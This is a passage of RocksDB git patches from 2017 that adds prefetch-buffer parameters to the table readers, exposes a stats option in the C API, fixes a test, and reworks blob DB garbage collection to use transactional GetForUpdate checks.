FilePrefetchBuffer* prefetch_buffer, + uint64_t file_size, Footer* footer, uint64_t enforce_table_magic_number = 0); // 1-byte type + 32-bit crc @@ -213,9 +215,9 @@ struct BlockContents { // Read the block identified by "handle" from "file". On failure // return non-OK. On success fill *result and return OK. extern Status ReadBlockContents( - RandomAccessFileReader* file, const Footer& footer, - const ReadOptions& options, const BlockHandle& handle, - BlockContents* contents, const ImmutableCFOptions &ioptions, + RandomAccessFileReader* file, FilePrefetchBuffer* prefetch_buffer, + const Footer& footer, const ReadOptions& options, const BlockHandle& handle, + BlockContents* contents, const ImmutableCFOptions& ioptions, bool do_uncompress = true, const Slice& compression_dict = Slice(), const PersistentCacheOptions& cache_options = PersistentCacheOptions()); diff --git a/table/meta_blocks.cc b/table/meta_blocks.cc index 5946e40fe0b..1227bb0aeb7 100644 --- a/table/meta_blocks.cc +++ b/table/meta_blocks.cc @@ -16,6 +16,7 @@ #include "table/persistent_cache_helper.h" #include "table/table_properties_internal.h" #include "util/coding.h" +#include "util/file_reader_writer.h" namespace rocksdb { @@ -159,7 +160,8 @@ bool NotifyCollectTableCollectorsOnFinish( } Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file, - const Footer& footer, const ImmutableCFOptions& ioptions, + FilePrefetchBuffer* prefetch_buffer, const Footer& footer, + const ImmutableCFOptions& ioptions, TableProperties** table_properties) { assert(table_properties); @@ -173,8 +175,8 @@ Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file, ReadOptions read_options; read_options.verify_checksums = false; Status s; - s = ReadBlockContents(file, footer, read_options, handle, &block_contents, - ioptions, false /* decompress */); + s = ReadBlockContents(file, prefetch_buffer, footer, read_options, handle, + &block_contents, ioptions, false /* decompress */); if (!s.ok()) { return s; @@ -277,7 +279,8 @@ Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size, TableProperties** properties) { // -- Read metaindex block Footer footer; - auto s = ReadFooterFromFile(file, file_size, &footer, table_magic_number); + auto s = ReadFooterFromFile(file, nullptr /* prefetch_buffer */, file_size, + &footer, table_magic_number); if (!s.ok()) { return s; } @@ -286,8 +289,9 @@ Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size, BlockContents metaindex_contents; ReadOptions read_options; read_options.verify_checksums = false; - s = ReadBlockContents(file, footer, read_options, metaindex_handle, - &metaindex_contents, ioptions, false /* decompress */); + s = ReadBlockContents(file, nullptr /* prefetch_buffer */, footer, + read_options, metaindex_handle, &metaindex_contents, + ioptions, false /* decompress */); if (!s.ok()) { return s; } @@ -305,7 +309,8 @@ Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size, TableProperties table_properties; if (found_properties_block == true) { - s = ReadProperties(meta_iter->value(), file, footer, ioptions, properties); + s = ReadProperties(meta_iter->value(), file, nullptr /* prefetch_buffer */, + footer, ioptions, properties); } else { s = Status::NotFound(); } @@ -332,7 +337,8 @@ Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size, const std::string& meta_block_name, BlockHandle* block_handle) { Footer footer; - auto s = ReadFooterFromFile(file, file_size, &footer, table_magic_number); + auto s = ReadFooterFromFile(file, nullptr /* prefetch_buffer */, file_size, + &footer, table_magic_number); if (!s.ok()) { return s; } @@ -341,8 +347,9 @@ Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size, BlockContents metaindex_contents; ReadOptions read_options; read_options.verify_checksums = false; - s = ReadBlockContents(file, footer, read_options, metaindex_handle, - &metaindex_contents, ioptions, false /* do decompression */); + s = ReadBlockContents(file, nullptr /* prefetch_buffer */, footer, + read_options, metaindex_handle, &metaindex_contents, + ioptions, false /* do decompression */); if (!s.ok()) { return s; } @@ -355,14 +362,16 @@ Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size, return FindMetaBlock(meta_iter.get(), meta_block_name, block_handle); } -Status ReadMetaBlock(RandomAccessFileReader* file, uint64_t file_size, +Status ReadMetaBlock(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, uint64_t file_size, uint64_t table_magic_number, - const ImmutableCFOptions &ioptions, + const ImmutableCFOptions& ioptions, const std::string& meta_block_name, BlockContents* contents) { Status status; Footer footer; - status = ReadFooterFromFile(file, file_size, &footer, table_magic_number); + status = ReadFooterFromFile(file, prefetch_buffer, file_size, &footer, + table_magic_number); if (!status.ok()) { return status; } @@ -372,8 +381,8 @@ Status ReadMetaBlock(RandomAccessFileReader* file, uint64_t file_size, BlockContents metaindex_contents; ReadOptions read_options; read_options.verify_checksums = false; - status = ReadBlockContents(file, footer, read_options, metaindex_handle, - &metaindex_contents, ioptions, + status = ReadBlockContents(file, prefetch_buffer, footer, read_options, + metaindex_handle, &metaindex_contents, ioptions, false /* decompress */); if (!status.ok()) { return status; @@ -394,8 +403,9 @@ Status ReadMetaBlock(RandomAccessFileReader* file, uint64_t file_size, } // Reading metablock - return ReadBlockContents(file, footer, read_options, block_handle, contents, - ioptions, false /* decompress */); + return ReadBlockContents(file, prefetch_buffer, footer, read_options, + block_handle, contents, ioptions, + false /* decompress */); } } // namespace rocksdb diff --git a/table/meta_blocks.h b/table/meta_blocks.h index ddb685360d6..220985d9e10 100644 --- a/table/meta_blocks.h +++ b/table/meta_blocks.h @@ -94,7 +94,8 @@ bool NotifyCollectTableCollectorsOnFinish( // *table_properties will point to a heap-allocated TableProperties // object, otherwise value of `table_properties` will not be modified. Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file, - const Footer& footer, const ImmutableCFOptions &ioptions, + FilePrefetchBuffer* prefetch_buffer, const Footer& footer, + const ImmutableCFOptions& ioptions, TableProperties** table_properties); // Directly read the properties from the properties block of a plain table. @@ -121,9 +122,10 @@ Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size, // Read the specified meta block with name meta_block_name // from `file` and initialize `contents` with contents of this block. // Return Status::OK in case of success. -Status ReadMetaBlock(RandomAccessFileReader* file, uint64_t file_size, +Status ReadMetaBlock(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, uint64_t file_size, uint64_t table_magic_number, - const ImmutableCFOptions &ioptions, + const ImmutableCFOptions& ioptions, const std::string& meta_block_name, BlockContents* contents); diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc index 2b330039e50..d3d7949d09f 100644 --- a/table/partitioned_filter_block.cc +++ b/table/partitioned_filter_block.cc @@ -132,7 +132,8 @@ bool PartitionedFilterBlockReader::KeyMayMatch( return false; } bool cached = false; - auto filter_partition = GetFilterPartition(&filter_handle, no_io, &cached); + auto filter_partition = GetFilterPartition(nullptr /* prefetch_buffer */, + &filter_handle, no_io, &cached); if (UNLIKELY(!filter_partition.value)) { return true; } @@ -164,7 +165,8 @@ bool PartitionedFilterBlockReader::PrefixMayMatch( return false; } bool cached = false; - auto filter_partition = GetFilterPartition(&filter_handle, no_io, &cached); + auto filter_partition = GetFilterPartition(nullptr /* prefetch_buffer */, + &filter_handle, no_io, &cached); if (UNLIKELY(!filter_partition.value)) { return true; } @@ -194,9 +196,9 @@ Slice PartitionedFilterBlockReader::GetFilterPartitionHandle( } BlockBasedTable::CachableEntry -PartitionedFilterBlockReader::GetFilterPartition(Slice* handle_value, - const bool no_io, - bool* cached) { +PartitionedFilterBlockReader::GetFilterPartition( + FilePrefetchBuffer* prefetch_buffer, Slice* handle_value, const bool no_io, + bool* cached) { BlockHandle fltr_blk_handle; auto s = fltr_blk_handle.DecodeFrom(handle_value); assert(s.ok()); @@ -232,7 +234,8 @@ PartitionedFilterBlockReader::GetFilterPartition(Slice* handle_value, } return filter; } else { - auto filter = table_->ReadFilter(fltr_blk_handle, is_a_filter_partition); + auto filter = table_->ReadFilter(prefetch_buffer, fltr_blk_handle, + is_a_filter_partition); return {filter, nullptr}; } } diff --git a/table/partitioned_filter_block.h b/table/partitioned_filter_block.h index 6c4a5d7b9d2..d408175390f 100644 --- a/table/partitioned_filter_block.h +++ b/table/partitioned_filter_block.h @@ -86,7 +86,8 @@ class PartitionedFilterBlockReader : public FilterBlockReader { private: Slice GetFilterPartitionHandle(const Slice& entry); BlockBasedTable::CachableEntry GetFilterPartition( - Slice* handle, const bool no_io, bool* cached); + FilePrefetchBuffer* prefetch_buffer, Slice* handle, const bool no_io, + bool* cached); const SliceTransform* prefix_extractor_; std::unique_ptr idx_on_fltr_blk_; diff --git a/table/plain_table_reader.cc b/table/plain_table_reader.cc index 92933b34ba1..d4d9edb7412 100644 --- a/table/plain_table_reader.cc +++ b/table/plain_table_reader.cc @@ -291,9 +291,10 @@ Status PlainTableReader::PopulateIndex(TableProperties* props, table_properties_.reset(props); BlockContents index_block_contents; - Status s = ReadMetaBlock( - file_info_.file.get(), file_size_, kPlainTableMagicNumber, ioptions_, - PlainTableIndexBuilder::kPlainTableIndexBlock, &index_block_contents); + Status s = ReadMetaBlock(file_info_.file.get(), nullptr /* prefetch_buffer */, + file_size_, kPlainTableMagicNumber, ioptions_, + PlainTableIndexBuilder::kPlainTableIndexBlock, + &index_block_contents); bool index_in_file = s.ok(); @@ -301,9 +302,9 @@ Status PlainTableReader::PopulateIndex(TableProperties* props, bool bloom_in_file = false; // We only need to read the bloom block if index block is in file. if (index_in_file) { - s = ReadMetaBlock(file_info_.file.get(), file_size_, kPlainTableMagicNumber, - ioptions_, BloomBlockBuilder::kBloomBlock, - &bloom_block_contents); + s = ReadMetaBlock(file_info_.file.get(), nullptr /* prefetch_buffer */, + file_size_, kPlainTableMagicNumber, ioptions_, + BloomBlockBuilder::kBloomBlock, &bloom_block_contents); bloom_in_file = s.ok() && bloom_block_contents.data.size() > 0; } diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index e6322f8b4d9..fa89e6cdd6a 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -79,7 +79,8 @@ Status SstFileReader::GetTableReader(const std::string& file_path) { file_.reset(new RandomAccessFileReader(std::move(file), file_path)); if (s.ok()) { - s = ReadFooterFromFile(file_.get(), file_size, &footer); + s = ReadFooterFromFile(file_.get(), nullptr /* prefetch_buffer */, + file_size, &footer); } if (s.ok()) { magic_number = footer.table_magic_number(); diff --git a/util/file_reader_writer.cc b/util/file_reader_writer.cc index 22ab7128781..f46b78fa06b 100644 --- a/util/file_reader_writer.cc +++ b/util/file_reader_writer.cc @@ -603,6 +603,34 @@ class ReadaheadRandomAccessFile : public RandomAccessFile { }; } // namespace +Status FilePrefetchBuffer::Prefetch(RandomAccessFileReader* reader, + uint64_t offset, size_t n) { + size_t alignment = reader->file()->GetRequiredBufferAlignment(); + uint64_t roundup_offset = Roundup(offset, alignment); + uint64_t roundup_len = Roundup(n, alignment); + buffer_.Alignment(alignment); + buffer_.AllocateNewBuffer(roundup_len); + + Slice result; + Status s = + reader->Read(roundup_offset, roundup_len, &result, buffer_.BufferStart()); + if (s.ok()) { + buffer_offset_ = roundup_offset; + buffer_len_ = result.size(); + } + return s; +} + +bool FilePrefetchBuffer::TryReadFromCache(uint64_t offset, size_t n, + Slice* result) const { + if (offset < buffer_offset_ || offset + n > buffer_offset_ + buffer_len_) { + return false; + } + uint64_t offset_in_buffer = offset - buffer_offset_; + *result = Slice(buffer_.BufferStart() + offset_in_buffer, n); + return true; +} + std::unique_ptr NewReadaheadRandomAccessFile( std::unique_ptr&& file, size_t readahead_size) { std::unique_ptr result( diff --git a/util/file_reader_writer.h b/util/file_reader_writer.h index deed73c38df..9be6924582b 100644 --- a/util/file_reader_writer.h +++ b/util/file_reader_writer.h @@ -196,6 +196,17 @@ class WritableFileWriter { Status SyncInternal(bool use_fsync); }; +class FilePrefetchBuffer { + public: + Status Prefetch(RandomAccessFileReader* reader, uint64_t offset, size_t n); + bool TryReadFromCache(uint64_t offset, size_t n, Slice* result) const; + + private: + AlignedBuffer buffer_; + uint64_t buffer_offset_; + size_t buffer_len_; +}; + extern Status NewWritableFile(Env* env, const std::string& fname, unique_ptr* result, const EnvOptions& options); From ac098a4626a386ca0ab3662e907b23f9037ba9f9 Mon Sep 17 00:00:00 2001 From: Kent767 Date: Fri, 11 Aug 2017 12:13:46 -0700 Subject: [PATCH 098/205] expose set_skip_stats_update_on_db_open to C bindings Summary: It would be super helpful to not have to recompile rocksdb to get this performance tweak for mechanical disks. I have signed the CLA. Closes https://github.com/facebook/rocksdb/pull/2718 Differential Revision: D5606994 Pulled By: yiwu-arbug fbshipit-source-id: c05e92bad0d03bd38211af1e1ced0d0d1e02f634 --- db/c.cc | 4 ++++ include/rocksdb/c.h | 2 ++ 2 files changed, 6 insertions(+) diff --git a/db/c.cc b/db/c.cc index 6952660a1b8..788eab68afb 100644 --- a/db/c.cc +++ b/db/c.cc @@ -2102,6 +2102,10 @@ void rocksdb_options_enable_statistics(rocksdb_options_t* opt) { opt->rep.statistics = rocksdb::CreateDBStatistics(); } +void rocksdb_options_set_skip_stats_update_on_db_open(rocksdb_options_t* opt, unsigned char val) { + opt->rep.skip_stats_update_on_db_open = val; +} + void rocksdb_options_set_num_levels(rocksdb_options_t* opt, int n) { opt->rep.num_levels = n; } diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 077030775f7..838d7b0c951 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -763,6 +763,8 @@ rocksdb_options_set_max_bytes_for_level_multiplier_additional( rocksdb_options_t*, int* level_values, size_t num_levels); extern ROCKSDB_LIBRARY_API void rocksdb_options_enable_statistics( rocksdb_options_t*); +extern ROCKSDB_LIBRARY_API void rocksdb_options_set_skip_stats_update_on_db_open( + rocksdb_options_t* opt, unsigned char val); /* returns a pointer to a malloc()-ed, null terminated string */ extern ROCKSDB_LIBRARY_API char* rocksdb_options_statistics_get_string( From 6f051e0c71d18dac88b8d96b8c534b6711a3a9f8 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 11 Aug 2017 12:18:58 -0700 Subject: [PATCH 099/205] fix corruption_test valgrind Summary: Closes https://github.com/facebook/rocksdb/pull/2724 Differential Revision: D5613416 Pulled By: ajkr fbshipit-source-id: ed55fb66ab1b41dfdfe765fe3264a1c87a8acb00 --- db/corruption_test.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/db/corruption_test.cc b/db/corruption_test.cc index 608c88d597d..56e157832c2 100644 --- a/db/corruption_test.cc +++ b/db/corruption_test.cc @@ -332,6 +332,7 @@ TEST_F(CorruptionTest, TableFileIndexData) { // corrupt an index block of an entire file Corrupt(kTableFile, -2000, 500); Reopen(); + dbi = reinterpret_cast(db_); // one full file should be readable, since only one was corrupted // the other file should be fully non-readable, since index was corrupted Check(5000, 5000); From e5a1b727c0ebd028c647649489e008c7d7840ee7 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Fri, 11 Aug 2017 12:30:02 -0700 Subject: [PATCH 100/205] Fix blob DB transaction usage while GC Summary: While GC, blob DB use optimistic transaction to delete or replace the index entry in LSM, to guarantee correctness if there's a normal write writing to the same key. However, the previous implementation doesn't call SetSnapshot() nor use GetForUpdate() of transaction API, instead it do its own sequence number checking before beginning the transaction. A normal write can sneak in after the sequence number check and overwrite the key, and the GC will delete or relocate the old version of the key by mistake. Update the code to property use GetForUpdate() to check the existing index entry. After the patch the sequence number store with each blob record is useless, So I'm considering remove the sequence number from blob record, in another patch. Closes https://github.com/facebook/rocksdb/pull/2703 Differential Revision: D5589178 Pulled By: yiwu-arbug fbshipit-source-id: 8dc960cd5f4e61b36024ba7c32d05584ce149c24 --- utilities/blob_db/blob_db_impl.cc | 320 ++++++++++++++++----------- utilities/blob_db/blob_db_impl.h | 11 +- utilities/blob_db/blob_db_test.cc | 103 +++++++-- utilities/blob_db/blob_log_reader.cc | 5 +- utilities/blob_db/blob_log_reader.h | 4 +- 5 files changed, 293 insertions(+), 150 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 9e1623eb5c4..a15fe4a18ab 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -30,6 +30,7 @@ #include "util/logging.h" #include "util/mutexlock.h" #include "util/random.h" +#include "util/sync_point.h" #include "util/timer_queue.h" #include "utilities/transactions/optimistic_transaction_db_impl.h" #include "utilities/transactions/optimistic_transaction.h" @@ -951,6 +952,7 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, Status BlobDBImpl::PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value_unc, uint64_t expiration) { + TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); MutexLock l(&write_mutex_); UpdateWriteOptions(options); @@ -1022,6 +1024,7 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, CloseIf(bfile); + TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish"); return s; } @@ -1655,8 +1658,8 @@ std::pair BlobDBImpl::WaStats(bool aborted) { // DELETED in the LSM //////////////////////////////////////////////////////////////////////////////// Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, - GCStats* gcstats) { - uint64_t tt = EpochNow(); + GCStats* gc_stats) { + uint64_t now = EpochNow(); std::shared_ptr reader = bfptr->OpenSequentialReader(env_, db_options_, env_options_); @@ -1679,8 +1682,6 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool first_gc = bfptr->gc_once_after_open_; ColumnFamilyHandle* cfh = bfptr->GetColumnFamily(db_); - auto cfhi = reinterpret_cast(cfh); - auto cfd = cfhi->cfd(); bool has_ttl = header.HasTTL(); // this reads the key but skips the blob @@ -1688,7 +1689,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, assert(opt_db_); - bool no_relocation_ttl = (has_ttl && tt > bfptr->GetTTLRange().second); + bool no_relocation_ttl = (has_ttl && now >= bfptr->GetTTLRange().second); bool no_relocation_lsmdel = false; { @@ -1707,136 +1708,199 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, BlobLogRecord record; std::shared_ptr newfile; std::shared_ptr new_writer; - - while (reader->ReadRecord(&record, shallow).ok()) { - gcstats->blob_count++; - - bool del_this = false; - bool reloc_this = false; - - // TODO(yiwu): The following logic should use GetForUpdate() from - // optimistic transaction to check if the key is current, otherwise - // there can be another writer sneak in between sequence number of - // and the deletion. - - // this particular TTL has expired - if (no_relocation_ttl || (has_ttl && tt > record.GetTTL())) { - del_this = true; - } else if (!first_gc) { - SequenceNumber seq = kMaxSequenceNumber; - bool found_record_for_key = false; - SuperVersion* sv = db_impl_->GetAndRefSuperVersion(cfd); - if (sv == nullptr) { - Status result = - Status::InvalidArgument("Could not access column family 0"); - return result; - } - Status s1 = db_impl_->GetLatestSequenceForKey( - sv, record.Key(), false, &seq, &found_record_for_key); - if (found_record_for_key && seq == record.GetSN()) { - reloc_this = true; + Transaction* transaction = nullptr; + uint64_t blob_offset = 0; + bool retry = false; + + static const WriteOptions kGarbageCollectionWriteOptions = []() { + WriteOptions write_options; + // TODO(yiwu): Disable WAL for garbage colection to make it compatible with + // use cases that don't use WAL. However without WAL there are at least + // two issues with crash: + // 1. If a key is dropped from blob file (e.g. due to TTL), right before a + // crash, the key may still presents in LSM after restart. + // 2. If a key is relocated to another blob file, right before a crash, + // after restart the new offset may be lost with the old offset pointing + // to the removed blob file. + // We need to have better recovery mechanism to address these issues. + write_options.disableWAL = true; + // It is ok to ignore column families that were dropped. + write_options.ignore_missing_column_families = true; + return write_options; + }(); + + while (true) { + assert(s.ok()); + if (retry) { + // Retry in case transaction fail with Status::TryAgain. + retry = false; + } else { + // Read the next blob record. + Status read_record_status = + reader->ReadRecord(&record, shallow, &blob_offset); + // Exit if we reach the end of blob file. + // TODO(yiwu): properly handle ReadRecord error. + if (!read_record_status.ok()) { + break; } - db_impl_->ReturnAndCleanupSuperVersion(cfd, sv); + gc_stats->blob_count++; } - if (del_this) { - gcstats->num_deletes++; - gcstats->deleted_size += record.GetBlobSize(); - if (first_gc) continue; - - Transaction* txn = opt_db_->BeginTransaction( - write_options_, OptimisticTransactionOptions(), nullptr); - txn->Delete(cfh, record.Key()); - Status s1 = txn->Commit(); - // chances that this DELETE will fail is low. If it fails, it would be - // because a new version of the key came in at this time, which will - // override the current version being iterated on. - if (!s1.IsBusy()) { - // assume that failures happen due to new writes. - gcstats->overrided_while_delete++; - } - delete txn; - } + transaction = + opt_db_->BeginTransaction(kGarbageCollectionWriteOptions, + OptimisticTransactionOptions(), transaction); - if (reloc_this) { - if (!newfile) { - // new file - std::string reason("GC of "); - reason += bfptr->PathName(); - newfile = NewBlobFile(reason); - gcstats->newfile = newfile; - - new_writer = CheckOrCreateWriterLocked(newfile); - newfile->header_ = std::move(header); - // Can't use header beyond this point - newfile->header_valid_ = true; - newfile->file_size_ = BlobLogHeader::kHeaderSize; - s = new_writer->WriteHeader(newfile->header_); - - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "File: %s - header writing failed", - newfile->PathName().c_str()); - return s; - } + std::string index_entry; + Status get_status = transaction->GetForUpdate(ReadOptions(), cfh, + record.Key(), &index_entry); + TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate"); + if (get_status.IsNotFound()) { + // Key has been deleted. Drop the blob record. + continue; + } + if (!get_status.ok()) { + s = get_status; + ROCKS_LOG_ERROR(db_options_.info_log, + "Error while getting index entry: %s", + s.ToString().c_str()); + break; + } - WriteLock wl(&mutex_); + // TODO(yiwu): We should have an override of GetForUpdate returning a + // PinnableSlice. + Slice index_entry_slice(index_entry); + BlobHandle handle; + s = handle.DecodeFrom(&index_entry_slice); + if (!s.ok()) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Error while decoding index entry: %s", + s.ToString().c_str()); + break; + } + if (handle.filenumber() != bfptr->BlobFileNumber() || + handle.offset() != blob_offset) { + // Key has been overwritten. Drop the blob record. + continue; + } - dir_change_.store(true); - blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile)); + // If key has expired, remove it from base DB. + if (no_relocation_ttl || (has_ttl && now >= record.GetTTL())) { + gc_stats->num_deletes++; + gc_stats->deleted_size += record.GetBlobSize(); + TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"); + transaction->Delete(cfh, record.Key()); + Status delete_status = transaction->Commit(); + if (delete_status.ok()) { + gc_stats->delete_succeeded++; + } else if (delete_status.IsBusy()) { + // The key is overwritten in the meanwhile. Drop the blob record. + gc_stats->overwritten_while_delete++; + } else if (delete_status.IsTryAgain()) { + // Retry the transaction. + retry = true; + } else { + // We hit an error. + s = delete_status; + ROCKS_LOG_ERROR(db_options_.info_log, + "Error while deleting expired key: %s", + s.ToString().c_str()); + break; } + // Continue to next blob record or retry. + continue; + } - gcstats->num_relocs++; - std::string index_entry; + if (first_gc) { + // Do not relocate blob record for initial GC. + continue; + } - uint64_t blob_offset = 0; - uint64_t key_offset = 0; - // write the blob to the blob log. - s = new_writer->AddRecord(record.Key(), record.Blob(), &key_offset, - &blob_offset, record.GetTTL()); - - BlobHandle handle; - handle.set_filenumber(newfile->BlobFileNumber()); - handle.set_size(record.Blob().size()); - handle.set_offset(blob_offset); - handle.set_compression(bdb_options_.compression); - handle.EncodeTo(&index_entry); - - new_writer->AddRecordFooter(record.GetSN()); - newfile->blob_count_++; - newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + - record.Blob().size() + BlobLogRecord::kFooterSize; - - Transaction* txn = opt_db_->BeginTransaction( - write_options_, OptimisticTransactionOptions(), nullptr); - txn->Put(cfh, record.Key(), index_entry); - Status s1 = txn->Commit(); - // chances that this Put will fail is low. If it fails, it would be - // because a new version of the key came in at this time, which will - // override the current version being iterated on. - if (s1.IsBusy()) { - ROCKS_LOG_INFO(db_options_.info_log, - "Optimistic transaction failed: %s put bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); - } else { - gcstats->succ_relocs++; - ROCKS_LOG_DEBUG(db_options_.info_log, - "Successfully added put back into LSM: %s bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); + // Relocate the blob record to new file. + if (!newfile) { + // new file + std::string reason("GC of "); + reason += bfptr->PathName(); + newfile = NewBlobFile(reason); + gc_stats->newfile = newfile; + + new_writer = CheckOrCreateWriterLocked(newfile); + newfile->header_ = std::move(header); + // Can't use header beyond this point + newfile->header_valid_ = true; + newfile->file_size_ = BlobLogHeader::kHeaderSize; + s = new_writer->WriteHeader(newfile->header_); + + if (!s.ok()) { + ROCKS_LOG_ERROR(db_options_.info_log, + "File: %s - header writing failed", + newfile->PathName().c_str()); + break; } - delete txn; - } - } - if (gcstats->newfile) total_blob_space_ += newfile->file_size_; + WriteLock wl(&mutex_); - ROCKS_LOG_INFO(db_options_.info_log, - "File: %s Num deletes %" PRIu32 " Num relocs: %" PRIu32 - " Succ Deletes: %" PRIu32 " Succ relocs: %" PRIu32, - bfptr->PathName().c_str(), gcstats->num_deletes, - gcstats->num_relocs, gcstats->succ_deletes_lsm, - gcstats->succ_relocs); + dir_change_.store(true); + blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile)); + } + + gc_stats->num_relocate++; + std::string new_index_entry; + uint64_t new_blob_offset = 0; + uint64_t new_key_offset = 0; + // write the blob to the blob log. + s = new_writer->AddRecord(record.Key(), record.Blob(), &new_key_offset, + &new_blob_offset, record.GetTTL()); + + BlobHandle new_handle; + new_handle.set_filenumber(newfile->BlobFileNumber()); + new_handle.set_size(record.Blob().size()); + new_handle.set_offset(new_blob_offset); + new_handle.set_compression(bdb_options_.compression); + new_handle.EncodeTo(&new_index_entry); + + new_writer->AddRecordFooter(record.GetSN()); + newfile->blob_count_++; + newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + + record.Blob().size() + BlobLogRecord::kFooterSize; + + TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"); + transaction->Put(cfh, record.Key(), new_index_entry); + Status put_status = transaction->Commit(); + if (put_status.ok()) { + gc_stats->relocate_succeeded++; + } else if (put_status.IsBusy()) { + // The key is overwritten in the meanwhile. Drop the blob record. + gc_stats->overwritten_while_relocate++; + } else if (put_status.IsTryAgain()) { + // Retry the transaction. + // TODO(yiwu): On retry, we can reuse the new blob record. + retry = true; + } else { + // We hit an error. + s = put_status; + ROCKS_LOG_ERROR(db_options_.info_log, "Error while relocating key: %s", + s.ToString().c_str()); + break; + } + } // end of ReadRecord loop + + if (transaction != nullptr) { + delete transaction; + } + ROCKS_LOG_INFO( + db_options_.info_log, "%s blob file %" PRIu64 ".", + ". Total blob records: %" PRIu64 ", Deletes: %" PRIu64 "/%" PRIu64 + " succeeded, Relocates: %" PRIu64 "/%" PRIu64 " succeeded.", + s.ok() ? "Successfully garbage collected" : "Failed to garbage collect", + bfptr->BlobFileNumber(), gc_stats->blob_count, gc_stats->delete_succeeded, + gc_stats->num_deletes, gc_stats->relocate_succeeded, + gc_stats->num_relocate); + if (newfile != nullptr) { + total_blob_space_ += newfile->file_size_; + ROCKS_LOG_INFO(db_options_.info_log, "New blob file %" PRIu64 ".", + newfile->BlobFileNumber()); + } return s; } @@ -2119,15 +2183,17 @@ std::pair BlobDBImpl::RunGC(bool aborted) { // in this collect the set of files, which became obsolete std::vector> obsoletes; for (auto bfile : to_process) { - GCStats gcstats; - Status s = GCFileAndUpdateLSM(bfile, &gcstats); - if (!s.ok()) continue; + GCStats gc_stats; + Status s = GCFileAndUpdateLSM(bfile, &gc_stats); + if (!s.ok()) { + continue; + } if (bfile->gc_once_after_open_.load()) { WriteLock lockbfile_w(&bfile->mutex_); - bfile->deleted_size_ = gcstats.deleted_size; - bfile->deleted_count_ = gcstats.num_deletes; + bfile->deleted_size_ = gc_stats.deleted_size; + bfile->deleted_count_ = gc_stats.num_deletes; bfile->gc_once_after_open_ = false; } else { obsoletes.push_back(bfile); diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index d812604bef5..6247fa22b79 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -137,10 +137,13 @@ struct GCStats { uint64_t blob_count = 0; uint64_t num_deletes = 0; uint64_t deleted_size = 0; - uint64_t num_relocs = 0; - uint64_t succ_deletes_lsm = 0; - uint64_t overrided_while_delete = 0; - uint64_t succ_relocs = 0; + uint64_t retry_delete = 0; + uint64_t delete_succeeded = 0; + uint64_t overwritten_while_delete = 0; + uint64_t num_relocate = 0; + uint64_t retry_relocate = 0; + uint64_t relocate_succeeded = 0; + uint64_t overwritten_while_relocate = 0; std::shared_ptr newfile = nullptr; }; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 9f3ae1b012f..28d4d5b8dea 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -15,6 +15,7 @@ #include "util/cast_util.h" #include "util/random.h" #include "util/string_util.h" +#include "util/sync_point.h" #include "util/testharness.h" #include "utilities/blob_db/blob_db_impl.h" @@ -177,7 +178,7 @@ TEST_F(BlobDBTest, PutWithTTL) { for (size_t i = 0; i < 100; i++) { uint64_t ttl = rnd.Next() % 100; PutRandomWithTTL("key" + ToString(i), ttl, &rnd, - (ttl < 50 ? nullptr : &data)); + (ttl <= 50 ? nullptr : &data)); } mock_env_->set_now_micros(100 * 1000000); auto *bdb_impl = static_cast(blob_db_); @@ -188,7 +189,7 @@ TEST_F(BlobDBTest, PutWithTTL) { GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + 